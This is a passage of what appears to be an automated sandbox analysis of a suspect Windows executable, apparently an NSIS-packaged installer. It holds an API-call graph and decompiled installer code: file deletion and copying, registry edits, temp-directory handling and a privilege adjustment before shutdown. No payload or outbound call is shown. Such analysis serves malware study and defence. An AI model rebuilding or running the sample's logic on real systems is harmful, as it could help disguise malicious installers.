3950 402bce 17 API calls 3949->3950 3951 401907 3950->3951 3952 405813 MessageBoxIndirectA 3951->3952 3953 401910 3952->3953 3954 404b80 GetDlgItem GetDlgItem 3955 404bd6 7 API calls 3954->3955 3963 404dfd 3954->3963 3956 404c72 SendMessageA 3955->3956 3957 404c7e DeleteObject 3955->3957 3956->3957 3958 404c89 3957->3958 3959 404cc0 3958->3959 3964 40618a 17 API calls 3958->3964 3961 40417b 18 API calls 3959->3961 3960 404edf 3962 404f8b 3960->3962 3967 404df0 3960->3967 3973 404f38 SendMessageA 3960->3973 3966 404cd4 3961->3966 3968 404f95 SendMessageA 3962->3968 3969 404f9d 3962->3969 3963->3960 3988 404e6c 3963->3988 4008 404ace SendMessageA 3963->4008 3965 404ca2 SendMessageA SendMessageA 3964->3965 3965->3958 3972 40417b 18 API calls 3966->3972 3970 4041e2 8 API calls 3967->3970 3968->3969 3976 404fb6 3969->3976 3977 404faf ImageList_Destroy 3969->3977 3984 404fc6 3969->3984 3975 40518b 3970->3975 3989 404ce5 3972->3989 3973->3967 3979 404f4d SendMessageA 3973->3979 3974 404ed1 SendMessageA 3974->3960 3980 404fbf GlobalFree 3976->3980 3976->3984 3977->3976 3978 40513f 3978->3967 3985 405151 ShowWindow GetDlgItem ShowWindow 3978->3985 3982 404f60 3979->3982 3980->3984 3981 404dbf GetWindowLongA SetWindowLongA 3983 404dd8 3981->3983 3993 404f71 SendMessageA 3982->3993 3986 404df5 3983->3986 3987 404ddd ShowWindow 3983->3987 3984->3978 4000 405001 3984->4000 4013 404b4e 3984->4013 3985->3967 4007 4041b0 SendMessageA 3986->4007 4006 4041b0 SendMessageA 3987->4006 3988->3960 3988->3974 3989->3981 3992 404d37 SendMessageA 3989->3992 3994 404dba 3989->3994 3995 404d75 SendMessageA 3989->3995 3996 404d89 SendMessageA 3989->3996 3992->3989 3993->3962 3994->3981 3994->3983 3995->3989 3996->3989 3998 40510b 3999 405115 InvalidateRect 3998->3999 4002 405121 3998->4002 3999->4002 4001 40502f SendMessageA 4000->4001 4004 405045 4000->4004 4001->4004 4002->3978 4022 404a89 4002->4022 4003 4050b9 SendMessageA SendMessageA 4003->4004 4004->3998 4004->4003 4006->3967 4007->3963 4009 404af1 GetMessagePos ScreenToClient SendMessageA 4008->4009 4010 404b2d SendMessageA 4008->4010 4011 404b2a 4009->4011 4012 404b25 4009->4012 4010->4012 4011->4010 4012->3988 4025 4060f7 lstrcpynA 4013->4025 4015 404b61 4026 406055 wsprintfA 4015->4026 4017 404b6b 4018 40140b 2 API calls 4017->4018 4019 404b74 4018->4019 4027 4060f7 lstrcpynA 4019->4027 4021 404b7b 4021->4000 4028 4049c4 4022->4028 4024 404a9e 4024->3978 4025->4015 4026->4017 4027->4021 4030 4049da 4028->4030 4029 40618a 17 API calls 4031 404a3e 4029->4031 4030->4029 4032 40618a 17 API calls 4031->4032 4033 404a49 4032->4033 4034 40618a 17 API calls 4033->4034 4035 404a5f lstrlenA wsprintfA SetDlgItemTextA 4034->4035 4035->4024 4036 401502 4037 40150a 4036->4037 4039 40151d 4036->4039 4038 402bac 17 API calls 4037->4038 4038->4039 4040 402604 4041 402bce 17 API calls 4040->4041 4042 40260b 4041->4042 4045 405c90 GetFileAttributesA CreateFileA 4042->4045 4044 402617 4045->4044 4046 401b87 4047 401b94 4046->4047 4048 401bd8 4046->4048 4049 401c1c 4047->4049 4054 401bab 4047->4054 4050 401c01 GlobalAlloc 4048->4050 4051 401bdc 4048->4051 4053 40618a 17 API calls 4049->4053 4059 402387 4049->4059 4052 40618a 17 API calls 4050->4052 4051->4059 4067 4060f7 lstrcpynA 4051->4067 4052->4049 4055 402381 4053->4055 4065 4060f7 lstrcpynA 4054->4065 4061 405813 MessageBoxIndirectA 4055->4061 4058 401bee GlobalFree 4058->4059 4060 401bba 4066 4060f7 lstrcpynA 4060->4066 4061->4059 4063 401bc9 4068 4060f7 lstrcpynA 4063->4068 4065->4060 4066->4063 4067->4058 4068->4059 4069 402588 4079 402c0e 4069->4079 4072 402bac 17 API calls 4073 40259b 4072->4073 4074 4025c2 RegEnumValueA 4073->4074 4075 4025b6 RegEnumKeyA 4073->4075 4077 4027bf 4073->4077 4076 4025d7 RegCloseKey 4074->4076 4075->4076 4076->4077 4080 402bce 17 API calls 4079->4080 4081 402c25 4080->4081 4082 405f7d RegOpenKeyExA 4081->4082 4083 402592 4082->4083 4083->4072 4084 40460d 4085 404639 4084->4085 4086 40464a 4084->4086 4145 4057f7 GetDlgItemTextA 4085->4145 4088 404656 GetDlgItem 4086->4088 4120 4046b5 4086->4120 4092 40466a 4088->4092 4089 404644 4091 4063d2 5 API calls 4089->4091 4090 404799 4094 404943 4090->4094 4147 4057f7 GetDlgItemTextA 4090->4147 4091->4086 4093 40467e SetWindowTextA 4092->4093 4096 405b28 4 API calls 4092->4096 4097 40417b 18 API calls 4093->4097 4100 4041e2 8 API calls 4094->4100 4102 404674 4096->4102 4103 40469a 4097->4103 4098 40618a 17 API calls 4104 404729 SHBrowseForFolderA 4098->4104 4099 4047c9 4105 405b7d 18 API calls 4099->4105 4101 404957 4100->4101 4102->4093 4109 405a8f 3 API calls 4102->4109 4106 40417b 18 API calls 4103->4106 4104->4090 4107 404741 CoTaskMemFree 4104->4107 4108 4047cf 4105->4108 4110 4046a8 4106->4110 4111 405a8f 3 API calls 4107->4111 4148 4060f7 lstrcpynA 4108->4148 4109->4093 4146 4041b0 SendMessageA 4110->4146 4113 40474e 4111->4113 4116 404785 SetDlgItemTextA 4113->4116 4121 40618a 17 API calls 4113->4121 4115 4046ae 4118 406500 5 API calls 4115->4118 4116->4090 4117 4047e6 4119 406500 5 API calls 4117->4119 4118->4120 4127 4047ed 4119->4127 4120->4090 4120->4094 4120->4098 4122 40476d lstrcmpiA 4121->4122 4122->4116 4125 40477e lstrcatA 4122->4125 4123 404829 4149 4060f7 lstrcpynA 4123->4149 4125->4116 4126 404830 4128 405b28 4 API calls 4126->4128 4127->4123 4131 405ad6 2 API calls 4127->4131 4133 404881 4127->4133 4129 404836 GetDiskFreeSpaceA 4128->4129 4132 40485a MulDiv 4129->4132 4129->4133 4131->4127 4132->4133 4134 4048f2 4133->4134 4136 404a89 20 API calls 4133->4136 4135 404915 4134->4135 4137 40140b 2 API calls 4134->4137 4150 40419d KiUserCallbackDispatcher 4135->4150 4138 4048df 4136->4138 4137->4135 4140 4048f4 SetDlgItemTextA 4138->4140 4141 4048e4 4138->4141 4140->4134 4143 4049c4 20 API calls 4141->4143 4142 404931 4142->4094 4144 404566 SendMessageA 4142->4144 4143->4134 4144->4094 4145->4089 4146->4115 4147->4099 4148->4117 4149->4126 4150->4142 4151 401490 4152 40521e 24 API calls 4151->4152 4153 401497 4152->4153 4154 405192 4155 4051a2 4154->4155 4156 4051b6 4154->4156 4157 4051ff 4155->4157 4158 4051a8 4155->4158 4159 4051be IsWindowVisible 4156->4159 4165 4051d5 4156->4165 4160 405204 CallWindowProcA 4157->4160 4161 4041c7 SendMessageA 4158->4161 4159->4157 4162 4051cb 4159->4162 4163 4051b2 4160->4163 4161->4163 4164 404ace 5 API calls 4162->4164 4164->4165 4165->4160 4166 404b4e 4 API calls 4165->4166 4166->4157 4167 402516 4168 402c0e 17 API calls 4167->4168 4169 402520 4168->4169 4170 402bce 17 API calls 4169->4170 4171 402529 4170->4171 4172 402533 RegQueryValueExA 4171->4172 4175 4027bf 4171->4175 4173 402559 RegCloseKey 4172->4173 4174 402553 4172->4174 4173->4175 4174->4173 4178 406055 wsprintfA 4174->4178 4178->4173 4179 40239c 4180 4023a4 4179->4180 4181 4023aa 4179->4181 4182 402bce 17 API calls 4180->4182 4183 4023ba 4181->4183 4184 402bce 17 API calls 4181->4184 4182->4181 4185 402bce 17 API calls 4183->4185 4187 4023c8 4183->4187 4184->4183 4185->4187 4186 402bce 17 API calls 4188 4023d1 WritePrivateProfileStringA 4186->4188 4187->4186 4189 40149d 4190 402387 4189->4190 4191 4014ab PostQuitMessage 4189->4191 4191->4190 4192 40159d 4193 402bce 17 API calls 4192->4193 4194 4015a4 SetFileAttributesA 4193->4194 4195 4015b6 4194->4195 4196 40209d 4197 40215d 4196->4197 4198 4020af 4196->4198 4201 401423 24 API calls 4197->4201 4199 402bce 17 API calls 4198->4199 4200 4020b6 4199->4200 4202 402bce 17 API calls 4200->4202 4207 4022e2 4201->4207 4203 4020bf 4202->4203 4204 4020d4 LoadLibraryExA 4203->4204 4205 4020c7 GetModuleHandleA 4203->4205 4204->4197 4206 4020e4 GetProcAddress 4204->4206 4205->4204 4205->4206 4208 402130 4206->4208 4209 4020f3 4206->4209 4210 40521e 24 API calls 4208->4210 4211 401423 24 API calls 4209->4211 4212 402103 4209->4212 4210->4212 4211->4212 4212->4207 4213 402151 FreeLibrary 4212->4213 4213->4207 4214 401a1e 4215 402bce 17 API calls 4214->4215 4216 401a27 ExpandEnvironmentStringsA 4215->4216 4217 401a3b 4216->4217 4219 401a4e 4216->4219 4218 401a40 lstrcmpA 4217->4218 4217->4219 4218->4219 4225 40171f 4226 402bce 17 API calls 4225->4226 4227 401726 SearchPathA 4226->4227 4228 401741 4227->4228 4229 401d1f 4230 402bac 17 API calls 4229->4230 4231 401d26 4230->4231 4232 402bac 17 API calls 4231->4232 4233 401d32 GetDlgItem 4232->4233 4234 402620 4233->4234 4235 402421 4236 402453 4235->4236 4237 402428 4235->4237 4238 402bce 17 API calls 4236->4238 4239 402c0e 17 API calls 4237->4239 4240 40245a 4238->4240 4241 40242f 4239->4241 4246 402c8c 4240->4246 4243 402bce 17 API calls 4241->4243 4245 402467 4241->4245 4244 402440 RegDeleteValueA RegCloseKey 4243->4244 4244->4245 4247 402c98 4246->4247 4248 402c9f 4246->4248 4247->4245 4248->4247 4250 402cd0 4248->4250 4251 405f7d RegOpenKeyExA 4250->4251 4252 402cfe 4251->4252 4253 402da8 4252->4253 4254 402d31 4252->4254 4255 402d0e RegEnumValueA 4252->4255 4253->4247 4256 402d98 RegCloseKey 4254->4256 4257 402d6d RegEnumKeyA 4254->4257 4258 402d76 RegCloseKey 4254->4258 4261 402cd0 6 API calls 4254->4261 4255->4254 4255->4256 4256->4253 4257->4254 4257->4258 4259 406500 5 API calls 4258->4259 4260 402d86 4259->4260 4260->4253 4262 402d8a RegDeleteKeyA 4260->4262 4261->4254 4262->4253 4263 4027a1 4264 402bce 17 API calls 4263->4264 4265 4027a8 FindFirstFileA 4264->4265 4266 4027cb 4265->4266 4270 4027bb 4265->4270 4267 4027d2 4266->4267 4271 406055 wsprintfA 4266->4271 4272 4060f7 lstrcpynA 4267->4272 4271->4267 4272->4270 4273 402626 4274 40262b 4273->4274 4275 40263f 4273->4275 4276 402bac 17 API calls 4274->4276 4277 402bce 17 API calls 4275->4277 4279 402634 4276->4279 4278 402646 lstrlenA 4277->4278 4278->4279 4280 402668 4279->4280 4281 405d37 WriteFile 4279->4281 4281->4280 3036 403ca7 3037 403dfa 3036->3037 3038 403cbf 3036->3038 3040 403e4b 3037->3040 3041 403e0b GetDlgItem GetDlgItem 3037->3041 3038->3037 3039 403ccb 3038->3039 3042 403cd6 SetWindowPos 3039->3042 3043 403ce9 3039->3043 3045 403ea5 3040->3045 3050 401389 2 API calls 3040->3050 3107 40417b 3041->3107 3042->3043 3047 403d06 3043->3047 3048 403cee ShowWindow 3043->3048 3051 403df5 3045->3051 3113 4041c7 3045->3113 3052 403d28 3047->3052 3053 403d0e DestroyWindow 3047->3053 3048->3047 3049 403e35 KiUserCallbackDispatcher 3110 40140b 3049->3110 3055 403e7d 3050->3055 3057 403d2d SetWindowLongA 3052->3057 3058 403d3e 3052->3058 3056 404104 3053->3056 3055->3045 3061 403e81 SendMessageA 3055->3061 3056->3051 3067 404135 ShowWindow 3056->3067 3057->3051 3059 403de7 3058->3059 3060 403d4a GetDlgItem 3058->3060 3129 4041e2 3059->3129 3064 403d7a 3060->3064 3065 403d5d SendMessageA IsWindowEnabled 3060->3065 3061->3051 3062 40140b 2 API calls 3074 403eb7 3062->3074 3063 404106 DestroyWindow EndDialog 3063->3056 3069 403d87 3064->3069 3070 403dce SendMessageA 3064->3070 3071 403d9a 3064->3071 3081 403d7f 3064->3081 3065->3051 3065->3064 3067->3051 3068 40618a 17 API calls 3068->3074 3069->3070 3069->3081 3070->3059 3075 403da2 3071->3075 3076 403db7 3071->3076 3073 40417b 18 API calls 3073->3074 3074->3051 3074->3062 3074->3063 3074->3068 3074->3073 3082 40417b 18 API calls 3074->3082 3098 404046 DestroyWindow 3074->3098 3079 40140b 2 API calls 3075->3079 3078 40140b 2 API calls 3076->3078 3077 403db5 3077->3059 3080 403dbe 3078->3080 3079->3081 3080->3059 3080->3081 3126 404154 3081->3126 3083 403f32 GetDlgItem 3082->3083 3084 403f47 3083->3084 3085 403f4f ShowWindow KiUserCallbackDispatcher 3083->3085 3084->3085 3116 40419d KiUserCallbackDispatcher 3085->3116 3087 403f79 EnableWindow 3092 403f8d 3087->3092 3088 403f92 GetSystemMenu EnableMenuItem SendMessageA 3089 403fc2 SendMessageA 3088->3089 3088->3092 3089->3092 3092->3088 3117 4041b0 SendMessageA 3092->3117 3118 403c88 3092->3118 3121 4060f7 lstrcpynA 3092->3121 3094 403ff1 lstrlenA 3095 40618a 17 API calls 3094->3095 3096 404002 SetWindowTextA 3095->3096 3122 401389 3096->3122 3098->3056 3099 404060 CreateDialogParamA 3098->3099 3099->3056 3100 404093 3099->3100 3101 40417b 18 API calls 3100->3101 3102 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3101->3102 3103 401389 2 API calls 3102->3103 3104 4040e4 3103->3104 3104->3051 3105 4040ec ShowWindow 3104->3105 3106 4041c7 SendMessageA 3105->3106 3106->3056 3108 40618a 17 API calls 3107->3108 3109 404186 SetDlgItemTextA 3108->3109 3109->3049 3111 401389 2 API calls 3110->3111 3112 401420 3111->3112 3112->3040 3114 4041d0 SendMessageA 3113->3114 3115 4041df 3113->3115 3114->3115 3115->3074 3116->3087 3117->3092 3119 40618a 17 API calls 3118->3119 3120 403c96 SetWindowTextA 3119->3120 3120->3092 3121->3094 3124 401390 3122->3124 3123 4013fe 3123->3074 3124->3123 3125 4013cb MulDiv SendMessageA 3124->3125 3125->3124 3127 404161 SendMessageA 3126->3127 3128 40415b 3126->3128 3127->3077 3128->3127 3130 4041fa GetWindowLongA 3129->3130 3131 4042a5 3129->3131 3130->3131 3132 40420f 3130->3132 3131->3051 3132->3131 3133 40423c GetSysColor 3132->3133 3134 40423f 3132->3134 3133->3134 3135 404245 SetTextColor 3134->3135 3136 40424f SetBkMode 3134->3136 3135->3136 3137 404267 GetSysColor 3136->3137 3138 40426d 3136->3138 3137->3138 3139 404274 SetBkColor 3138->3139 3140 40427e 3138->3140 3139->3140 3140->3131 3141 404291 DeleteObject 3140->3141 3142 404298 CreateBrushIndirect 3140->3142 3141->3142 3142->3131 4282 40272b 4283 402732 4282->4283 4289 4029aa 4282->4289 4284 402bac 17 API calls 4283->4284 4285 402739 4284->4285 4286 402748 SetFilePointer 4285->4286 4287 402758 4286->4287 4286->4289 4290 406055 wsprintfA 4287->4290 4290->4289 4291 401c2e 4292 402bac 17 API calls 4291->4292 4293 401c35 4292->4293 4294 402bac 17 API calls 4293->4294 4295 401c42 4294->4295 4297 402bce 17 API calls 4295->4297 4301 401c57 4295->4301 4296 401c67 4299 401c72 4296->4299 4300 401cbe 4296->4300 4297->4301 4298 402bce 17 API calls 4298->4296 4302 402bac 17 API calls 4299->4302 4303 402bce 17 API calls 4300->4303 4301->4296 4301->4298 4304 401c77 4302->4304 4305 401cc3 4303->4305 4306 402bac 17 API calls 4304->4306 4307 402bce 17 API calls 4305->4307 4309 401c83 4306->4309 4308 401ccc FindWindowExA 4307->4308 4312 401cea 4308->4312 4310 401c90 SendMessageTimeoutA 4309->4310 4311 401cae SendMessageA 4309->4311 4310->4312 4311->4312 2848 403830 2849 403848 2848->2849 2850 40383a CloseHandle 2848->2850 2855 403875 2849->2855 2850->2849 2856 403883 2855->2856 2857 403888 FreeLibrary GlobalFree 2856->2857 2858 40384d 2856->2858 2857->2857 2857->2858 2859 4058bf 2858->2859 2896 405b7d 2859->2896 2862 4058e7 DeleteFileA 2891 403859 2862->2891 2863 4058fe 2864 405a2c 2863->2864 2911 4060f7 lstrcpynA 2863->2911 2864->2891 2944 40646b FindFirstFileA 2864->2944 2866 405924 2867 405937 2866->2867 2868 40592a lstrcatA 2866->2868 2912 405ad6 lstrlenA 2867->2912 2869 40593d 2868->2869 2873 40594b lstrcatA 2869->2873 2874 405956 lstrlenA FindFirstFileA 2869->2874 2873->2874 2874->2864 2894 40597a 2874->2894 2878 405877 5 API calls 2879 405a66 2878->2879 2880 405a80 2879->2880 2881 405a6a 2879->2881 2884 40521e 24 API calls 2880->2884 2886 40521e 24 API calls 2881->2886 2881->2891 2882 405a0b FindNextFileA 2885 405a23 FindClose 2882->2885 2882->2894 2884->2891 2885->2864 2887 405a77 2886->2887 2888 405ed6 36 API calls 2887->2888 2888->2891 2890 4058bf 60 API calls 2890->2894 2892 40521e 24 API calls 2892->2882 2894->2882 2894->2890 2894->2892 2916 405aba 2894->2916 2920 4060f7 lstrcpynA 2894->2920 2921 405877 2894->2921 2929 40521e 2894->2929 2940 405ed6 MoveFileExA 2894->2940 2950 4060f7 lstrcpynA 2896->2950 2898 405b8e 2951 405b28 CharNextA CharNextA 2898->2951 2901 4058df 2901->2862 2901->2863 2904 405bcf lstrlenA 2905 405bda 2904->2905 2908 405bb7 2904->2908 2907 405a8f 3 API calls 2905->2907 2906 40646b 2 API calls 2906->2908 2909 405bdf GetFileAttributesA 2907->2909 2908->2901 2908->2904 2908->2906 2910 405ad6 2 API calls 2908->2910 2909->2901 2910->2904 2911->2866 2913 405ae3 2912->2913 2914 405af4 2913->2914 2915 405ae8 CharPrevA 2913->2915 2914->2869 2915->2913 2915->2914 2917 405ac0 2916->2917 2918 405ad3 2917->2918 2919 405ac6 CharNextA 2917->2919 2918->2894 2919->2917 2920->2894 2966 405c6b GetFileAttributesA 2921->2966 2924 4058a4 2924->2894 2925 405892 RemoveDirectoryA 2927 4058a0 2925->2927 2926 40589a DeleteFileA 2926->2927 2927->2924 2928 4058b0 SetFileAttributesA 2927->2928 2928->2924 2930 405239 2929->2930 2939 4052dc 2929->2939 2931 405256 lstrlenA 2930->2931 2969 40618a 2930->2969 2933 405264 lstrlenA 2931->2933 2934 40527f 2931->2934 2935 405276 lstrcatA 2933->2935 2933->2939 2936 405292 2934->2936 2937 405285 SetWindowTextA 2934->2937 2935->2934 2938 405298 SendMessageA SendMessageA SendMessageA 2936->2938 2936->2939 2937->2936 2938->2939 2939->2894 2941 405ef7 2940->2941 2942 405eea 2940->2942 2941->2894 2998 405d66 2942->2998 2945 406481 FindClose 2944->2945 2946 405a50 2944->2946 2945->2946 2946->2891 2947 405a8f lstrlenA CharPrevA 2946->2947 2948 405a5a 2947->2948 2949 405aa9 lstrcatA 2947->2949 2948->2878 2949->2948 2950->2898 2952 405b43 2951->2952 2954 405b53 2951->2954 2952->2954 2955 405b4e CharNextA 2952->2955 2953 405b73 2953->2901 2957 4063d2 2953->2957 2954->2953 2956 405aba CharNextA 2954->2956 2955->2953 2956->2954 2964 4063de 2957->2964 2958 406446 2959 40644a CharPrevA 2958->2959 2961 405ba4 2958->2961 2959->2958 2960 40643b CharNextA 2960->2958 2960->2964 2961->2901 2961->2908 2962 405aba CharNextA 2962->2964 2963 406429 CharNextA 2963->2964 2964->2958 2964->2960 2964->2962 2964->2963 2965 406436 CharNextA 2964->2965 2965->2960 2967 405883 2966->2967 2968 405c7d SetFileAttributesA 2966->2968 2967->2924 2967->2925 2967->2926 2968->2967 2984 406197 2969->2984 2970 4063b9 2971 4063ce 2970->2971 2993 4060f7 lstrcpynA 2970->2993 2971->2931 2973 406393 lstrlenA 2973->2984 2976 40618a 10 API calls 2976->2973 2978 4062af GetSystemDirectoryA 2978->2984 2979 4062c2 GetWindowsDirectoryA 2979->2984 2980 4063d2 5 API calls 2980->2984 2981 4062f6 SHGetSpecialFolderLocation 2981->2984 2985 40630e SHGetPathFromIDListA CoTaskMemFree 2981->2985 2982 40618a 10 API calls 2982->2984 2983 40633c lstrcatA 2983->2984 2984->2970 2984->2973 2984->2976 2984->2978 2984->2979 2984->2980 2984->2981 2984->2982 2984->2983 2986 405fde 2984->2986 2991 406055 wsprintfA 2984->2991 2992 4060f7 lstrcpynA 2984->2992 2985->2984 2994 405f7d 2986->2994 2989 406012 RegQueryValueExA RegCloseKey 2990 406041 2989->2990 2990->2984 2991->2984 2992->2984 2993->2971 2995 405f8c 2994->2995 2996 405f90 2995->2996 2997 405f95 RegOpenKeyExA 2995->2997 2996->2989 2996->2990 2997->2996 2999 405db2 GetShortPathNameA 2998->2999 3000 405d8c 2998->3000 3002 405ed1 2999->3002 3003 405dc7 2999->3003 3025 405c90 GetFileAttributesA CreateFileA 3000->3025 3002->2941 3003->3002 3005 405dcf wsprintfA 3003->3005 3004 405d96 CloseHandle GetShortPathNameA 3004->3002 3007 405daa 3004->3007 3006 40618a 17 API calls 3005->3006 3008 405df7 3006->3008 3007->2999 3007->3002 3026 405c90 GetFileAttributesA CreateFileA 3008->3026 3010 405e04 3010->3002 3011 405e13 GetFileSize GlobalAlloc 3010->3011 3012 405e35 3011->3012 3013 405eca CloseHandle 3011->3013 3027 405d08 ReadFile 3012->3027 3013->3002 3018 405e54 lstrcpyA 3021 405e76 3018->3021 3019 405e68 3020 405bf5 4 API calls 3019->3020 3020->3021 3022 405ead SetFilePointer 3021->3022 3034 405d37 WriteFile 3022->3034 3025->3004 3026->3010 3028 405d26 3027->3028 3028->3013 3029 405bf5 lstrlenA 3028->3029 3030 405c36 lstrlenA 3029->3030 3031 405c0f lstrcmpiA 3030->3031 3032 405c3e 3030->3032 3031->3032 3033 405c2d CharNextA 3031->3033 3032->3018 3032->3019 3033->3030 3035 405d55 GlobalFree 3034->3035 3035->3013 4313 4042b1 lstrcpynA lstrlenA 4320 401e35 GetDC 4321 402bac 17 API calls 4320->4321 4322 401e47 GetDeviceCaps MulDiv ReleaseDC 4321->4322 4323 402bac 17 API calls 4322->4323 4324 401e78 4323->4324 4325 40618a 17 API calls 4324->4325 4326 401eb5 CreateFontIndirectA 4325->4326 4327 402620 4326->4327 4328 402a35 SendMessageA 4329 402a5a 4328->4329 4330 402a4f InvalidateRect 4328->4330 4330->4329 4331 4014b7 4332 4014bd 4331->4332 4333 401389 2 API calls 4332->4333 4334 4014c5 4333->4334 4335 402dba 4336 402de2 4335->4336 4337 402dc9 SetTimer 4335->4337 4338 402e37 4336->4338 4339 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4336->4339 4337->4336 4339->4338 3496 4015bb 3497 402bce 17 API calls 3496->3497 3498 4015c2 3497->3498 3499 405b28 4 API calls 3498->3499 3505 4015ca 3499->3505 3500 401624 3502 401652 3500->3502 3503 401629 3500->3503 3501 405aba CharNextA 3501->3505 3507 401423 24 API calls 3502->3507 3516 401423 3503->3516 3505->3500 3505->3501 3509 405761 2 API calls 3505->3509 3510 40577e 5 API calls 3505->3510 3513 40160c GetFileAttributesA 3505->3513 3515 4015f3 3505->3515 3512 40164a 3507->3512 3509->3505 3510->3505 3511 40163b SetCurrentDirectoryA 3511->3512 3513->3505 3514 4056e4 4 API calls 3514->3515 3515->3505 3515->3514 3517 40521e 24 API calls 3516->3517 3518 401431 3517->3518 3519 4060f7 lstrcpynA 3518->3519 3519->3511 4340 4016bb 4341 402bce 17 API calls 4340->4341 4342 4016c1 GetFullPathNameA 4341->4342 4343 4016d8 4342->4343 4349 4016f9 4342->4349 4345 40646b 2 API calls 4343->4345 4343->4349 4344 40170d GetShortPathNameA 4346 402a5a 4344->4346 4347 4016e9 4345->4347 4347->4349 4350 4060f7 lstrcpynA 4347->4350 4349->4344 4349->4346 4350->4349

                                                        Executed Functions

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 403348-403387 SetErrorMode GetVersion 1 403389-403391 call 406500 0->1 2 40339a 0->2 1->2 8 403393 1->8 3 40339f-4033b2 call 406492 lstrlenA 2->3 9 4033b4-4033d0 call 406500 * 3 3->9 8->2 16 4033e1-40343f #17 OleInitialize SHGetFileInfoA call 4060f7 GetCommandLineA call 4060f7 9->16 17 4033d2-4033d8 9->17 24 403441-403446 16->24 25 40344b-403460 call 405aba CharNextA 16->25 17->16 22 4033da 17->22 22->16 24->25 28 403525-403529 25->28 29 403465-403468 28->29 30 40352f 28->30 31 403470-403478 29->31 32 40346a-40346e 29->32 33 403542-40355c GetTempPathA call 403317 30->33 34 403480-403483 31->34 35 40347a-40347b 31->35 32->31 32->32 40 4035b4-4035ce DeleteFileA call 402ea1 33->40 41 40355e-40357c GetWindowsDirectoryA lstrcatA call 403317 33->41 37 403515-403522 call 405aba 34->37 38 403489-40348d 34->38 35->34 37->28 57 403524 37->57 43 4034a5-4034d2 38->43 44 40348f-403495 38->44 59 403662-403672 ExitProcess OleUninitialize 40->59 60 4035d4-4035da 40->60 41->40 58 40357e-4035ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403317 41->58 46 4034d4-4034da 43->46 47 4034e5-403513 43->47 50 403497-403499 44->50 51 40349b 44->51 53 4034e0 46->53 54 4034dc-4034de 46->54 47->37 55 403531-40353d call 4060f7 47->55 50->43 50->51 51->43 53->47 54->47 54->53 55->33 57->28 58->40 58->59 65 403796-40379c 59->65 66 403678-403688 call 405813 ExitProcess 59->66 63 403652-403659 call 40390a 60->63 64 4035dc-4035e7 call 405aba 60->64 75 40365e 63->75 81 4035e9-403612 64->81 82 40361d-403627 64->82 67 403818-403820 65->67 68 40379e-4037b7 GetCurrentProcess OpenProcessToken 65->68 77 403822 67->77 78 403826-40382a ExitProcess 67->78 73 4037e9-4037f7 call 406500 68->73 74 4037b9-4037e3 LookupPrivilegeValueA AdjustTokenPrivileges 68->74 89 403805-40380f ExitWindowsEx 73->89 90 4037f9-403803 73->90 74->73 75->59 77->78 86 403614-403616 81->86 83 403629-403636 call 405b7d 82->83 84 40368e-4036a2 call 40577e lstrcatA 82->84 83->59 97 403638-40364e call 4060f7 * 2 83->97 95 4036a4-4036aa lstrcatA 84->95 96 4036af-4036c9 lstrcatA lstrcmpiA 84->96 86->82 91 403618-40361b 86->91 89->67 94 403811-403813 call 40140b 89->94 90->89 90->94 91->82 91->86 94->67 95->96 96->59 100 4036cb-4036ce 96->100 97->63 102 4036d0-4036d5 call 4056e4 100->102 103 4036d7 call 405761 100->103 110 4036dc-4036e9 SetCurrentDirectoryA 102->110 103->110 111 4036f6-40371e call 4060f7 110->111 112 4036eb-4036f1 call 4060f7 110->112 116 403724-403740 call 40618a DeleteFileA 111->116 112->111 119 403781-403788 116->119 120 403742-403752 CopyFileA 116->120 119->116 122 40378a-403791 call 405ed6 119->122 120->119 121 403754-403774 call 405ed6 call 40618a call 405796 120->121 121->119 131 403776-40377d CloseHandle 121->131 122->59 131->119
                                                        C-Code - Quality: 85%
                                                        			_entry_() {
                                                        				signed int _t42;
                                                        				intOrPtr* _t47;
                                                        				CHAR* _t51;
                                                        				char* _t53;
                                                        				CHAR* _t55;
                                                        				void* _t59;
                                                        				intOrPtr _t61;
                                                        				int _t62;
                                                        				int _t65;
                                                        				signed int _t66;
                                                        				int _t67;
                                                        				signed int _t69;
                                                        				void* _t93;
                                                        				signed int _t109;
                                                        				void* _t112;
                                                        				void* _t117;
                                                        				intOrPtr* _t118;
                                                        				char _t121;
                                                        				signed int _t140;
                                                        				signed int _t141;
                                                        				int _t149;
                                                        				void* _t150;
                                                        				intOrPtr* _t152;
                                                        				CHAR* _t155;
                                                        				CHAR* _t156;
                                                        				void* _t158;
                                                        				char* _t159;
                                                        				void* _t162;
                                                        				void* _t163;
                                                        				char _t188;
                                                        
                                                        				 *(_t163 + 0x18) = 0;
                                                        				 *((intOrPtr*)(_t163 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                        				 *(_t163 + 0x20) = 0;
                                                        				 *(_t163 + 0x14) = 0x20;
                                                        				SetErrorMode(0x8001); // executed
                                                        				_t42 = GetVersion() & 0xbfffffff;
                                                        				 *0x42f42c = _t42;
                                                        				if(_t42 != 6) {
                                                        					_t118 = E00406500(0);
                                                        					if(_t118 != 0) {
                                                        						 *_t118(0xc00);
                                                        					}
                                                        				}
                                                        				_t155 = "UXTHEME";
                                                        				do {
                                                        					E00406492(_t155); // executed
                                                        					_t155 =  &(_t155[lstrlenA(_t155) + 1]);
                                                        				} while ( *_t155 != 0);
                                                        				E00406500(0xb);
                                                        				 *0x42f424 = E00406500(9);
                                                        				_t47 = E00406500(7);
                                                        				if(_t47 != 0) {
                                                        					_t47 =  *_t47(0x1e);
                                                        					if(_t47 != 0) {
                                                        						 *0x42f42f =  *0x42f42f | 0x00000040;
                                                        					}
                                                        				}
                                                        				__imp__#17(_t158);
                                                        				__imp__OleInitialize(0); // executed
                                                        				 *0x42f4f8 = _t47;
                                                        				SHGetFileInfoA(0x429850, 0, _t163 + 0x38, 0x160, 0); // executed
                                                        				E004060F7("Name Setup", "NSIS Error");
                                                        				_t51 = GetCommandLineA();
                                                        				_t159 = "\"C:\\Users\\engineer\\Desktop\\dY5HmgsBm6.exe\" ";
                                                        				E004060F7(_t159, _t51);
                                                        				 *0x42f420 = 0x400000;
                                                        				_t53 = _t159;
                                                        				if("\"C:\\Users\\engineer\\Desktop\\dY5HmgsBm6.exe\" " == 0x22) {
                                                        					 *(_t163 + 0x14) = 0x22;
                                                        					_t53 =  &M00435001;
                                                        				}
